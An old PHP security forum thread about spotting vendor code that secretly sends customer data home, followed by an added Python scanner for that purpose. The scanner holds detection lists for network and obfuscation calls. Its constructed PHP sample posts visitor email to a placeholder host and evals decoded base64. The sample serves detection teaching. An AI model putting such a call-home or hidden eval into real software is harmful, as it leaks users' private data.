Privacy leaks(?)

Discussions of secure PHP coding. Security in software is important, so don't be afraid to ask. And when answering: be anal. Nitpick. No security vulnerability is too small.


jr_barnes1980
Forum Newbie
Posts: 2
Joined: Tue Jan 23, 2007 8:48 pm

Privacy leaks(?)

Post by jr_barnes1980 »

Hello folks. I'm very new to PHP but it seems to be a pretty cool coding system.

Here is my problem: I purchased a program written in PHP, but failed to read their EULA, which says they have written code into the software that tracks where it is located. They say this is so they can ensure that it is only used on one site, since I only purchased one license. That, per se, isn't a huge deal really. I'm not a thief or I wouldn't have paid for the software. What concerns me is "What if they have written in other code that compromises my potential customers' private information?"

Since PHP is new to me can someone give me an idea of what coding I might look for to ensure that private information isn't sent back to their server?

Thank you.

JRB
Kieran Huggins
DevNet Master
Posts: 3635
Joined: Wed Dec 06, 2006 4:14 pm
Location: Toronto, Canada

Post by Kieran Huggins »

If you don't feel confident, don't use the software. Ask for a refund.
Mordred
DevNet Resident
Posts: 1579
Joined: Sun Sep 03, 2006 5:19 am
Location: Sofia, Bulgaria

Post by Mordred »

"What if they have written in other code that compromises my potential customers' private information?"

This (or worse) is valid for every application you use. If it were open source, and mature enough, the community behind it would most likely have weeded out most security problems, intentionally introduced or not. As it is, you have the option of paying for a pen-test or, if the code is available, a code review. This should be done by a competent professional; you as a PHP newbie (no offense) have little chance of finding all the potential problems. Check the obfuscated PHP code contests in the general forum AND the numerous security and code reviews done around here.
jr_barnes1980
Forum Newbie
Posts: 2
Joined: Tue Jan 23, 2007 8:48 pm

Pen-Test

Post by jr_barnes1980 »

No offense taken Mordred. Thanks for the advice. I considered going to the local university's computer department and seeing if one of their computer science majors could look at it for me, but they don't have any classes on PHP. They do have classes on Java, C++ and a few other languages; how closely do these languages resemble PHP, and would they be able to track it down? Any suggestions as to where I can look to find someone that would know what they are looking for and can tell me if the software is compromised?

Another idea I had was to use the search function on Windows and look for words in the files that might hint at a backdoor into it. The problem is that I don't know what type of code to look for. Any suggestions?

Thanks for the help folks. Any other suggestions will be greatly appreciated.

JRB
Kieran Huggins
DevNet Master
Posts: 3635
Joined: Wed Dec 06, 2006 4:14 pm
Location: Toronto, Canada

Post by Kieran Huggins »

It's probably well buried to avoid detection.

I figure it boils down to this: You either trust them or you don't. If you don't trust them, don't run their code. Period.
feyd
Neighborhood Spidermoddy
Posts: 31559
Joined: Mon Mar 29, 2004 3:24 pm
Location: Bothell, Washington, USA

Post by feyd »

You could always set up their code in a sandbox and monitor the communications the box attempts to send to other resources, but if you're getting into that, it's probably better (and less time consuming) to use another, more trustworthy, product.
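The thread leaves two practical questions open: what "type of code" to search a purchased PHP package for (JRB's question), and how to decide whether a package deserves the sandbox-and-monitor treatment feyd suggests. The script below is an added example written for this thread, not code posted by anyone here or from any vendor. It is a first-pass static triage in Python: it walks PHP source line by line and flags calls that can move data off the server (curl, sockets, mail, URL-fed fopen/file_get_contents), calls that hide what code does (eval, base64_decode, gzinflate and friends), literal URLs, and which request superglobals the file reads. The sample PHP it scans is constructed for the example, and `license.example.invalid` is a placeholder host. The limitation is exactly Kieran's point: a vendor who wants to hide a call-home can obfuscate past any name list, so a clean result here is a reason to read on, not a reason to trust, and the sandbox network monitoring stays the stronger check.

```python
"""Static triage of a PHP package for outbound-network and obfuscation indicators.
Added example for this thread; the PHP sample below is constructed, not a real product."""
import re
from dataclasses import dataclass

# Calls that can move data off the server. Plain name matching: a triage aid, not a proof of safety.
NETWORK_SINKS = {"curl_init", "curl_exec", "fsockopen", "pfsockopen",
                 "stream_socket_client", "socket_connect", "mail"}
# Read functions that are only interesting when pointed at a URL (local reads are normal).
REMOTE_IF_URL = {"fopen", "file_get_contents"}
# Calls that hide what code does, or execute decoded strings.
OBFUSCATION_SINKS = {"eval", "base64_decode", "gzinflate", "gzuncompress",
                     "str_rot13", "assert", "create_function"}

ALL_NAMES = NETWORK_SINKS | REMOTE_IF_URL | OBFUSCATION_SINKS
CALL_RE = re.compile(r"\b(" + "|".join(sorted(ALL_NAMES, key=len, reverse=True)) + r")\s*\(")
URL_RE = re.compile(r"https?://[^\s'\"]+", re.IGNORECASE)
SUPERGLOBAL_RE = re.compile(r"\$_(POST|GET|COOKIE|SERVER|SESSION|REQUEST)\b")


@dataclass
class Finding:
    line: int
    kind: str     # "network", "obfuscation" or "url"
    detail: str   # function name, or the URL literal


def scan_php_source(source: str) -> list[Finding]:
    """Return one Finding per suspicious call or URL literal, with its line number."""
    findings: list[Finding] = []
    for lineno, text in enumerate(source.splitlines(), start=1):
        urls = URL_RE.findall(text)
        for m in CALL_RE.finditer(text):
            name = m.group(1)
            if name in OBFUSCATION_SINKS:
                findings.append(Finding(lineno, "obfuscation", name))
            elif name in NETWORK_SINKS or urls:  # fopen/file_get_contents count only with a URL
                findings.append(Finding(lineno, "network", name))
        for url in urls:
            findings.append(Finding(lineno, "url", url))
    return findings


def risk_summary(source: str) -> dict:
    """Roll findings up into what a reviewer wants first: counts, URLs, request data read."""
    findings = scan_php_source(source)
    network = sum(1 for f in findings if f.kind == "network")
    obfuscation = sum(1 for f in findings if f.kind == "obfuscation")
    urls = [f.detail for f in findings if f.kind == "url"]
    superglobals = sorted(set(SUPERGLOBAL_RE.findall(source)))
    return {
        "network": network,
        "obfuscation": obfuscation,
        "urls": urls,
        "superglobals": superglobals,
        # Worth a human read when request data and an outbound channel coexist, or code is hidden.
        "suspicious": (network > 0 and bool(superglobals)) or obfuscation > 0,
    }


# Constructed sample: a license check that also posts visitor data home, plus a hidden eval.
SAMPLE_PHP = """\
<?php
// license check that also posts visitor data to the vendor
$payload = http_build_query(array(
    'host'  => $_SERVER['HTTP_HOST'],
    'email' => $_POST['email'],
));
$ch = curl_init('http://license.example.invalid/check');
curl_setopt($ch, CURLOPT_POSTFIELDS, $payload);
$resp = curl_exec($ch);
$tpl = file_get_contents(dirname(__FILE__) . '/templates/page.html');
eval(base64_decode('ZWNobyAiaGkiOw=='));
mail('owner@example.invalid', 'New order', $body);
"""

if __name__ == "__main__":
    for f in scan_php_source(SAMPLE_PHP):
        print(f"line {f.line:>3}  {f.kind:<12} {f.detail}")
    print(risk_summary(SAMPLE_PHP))
```

Run it over a real package with a loop over `*.php` files and read every flagged line in context: `mail()` in an order form is expected, `curl_exec()` in a file named `license.php` that also touches `$_POST` is the kind of thing the thread is worried about. The `suspicious` flag is deliberately coarse; it exists to rank files for the human reading Mordred recommends, not to replace it.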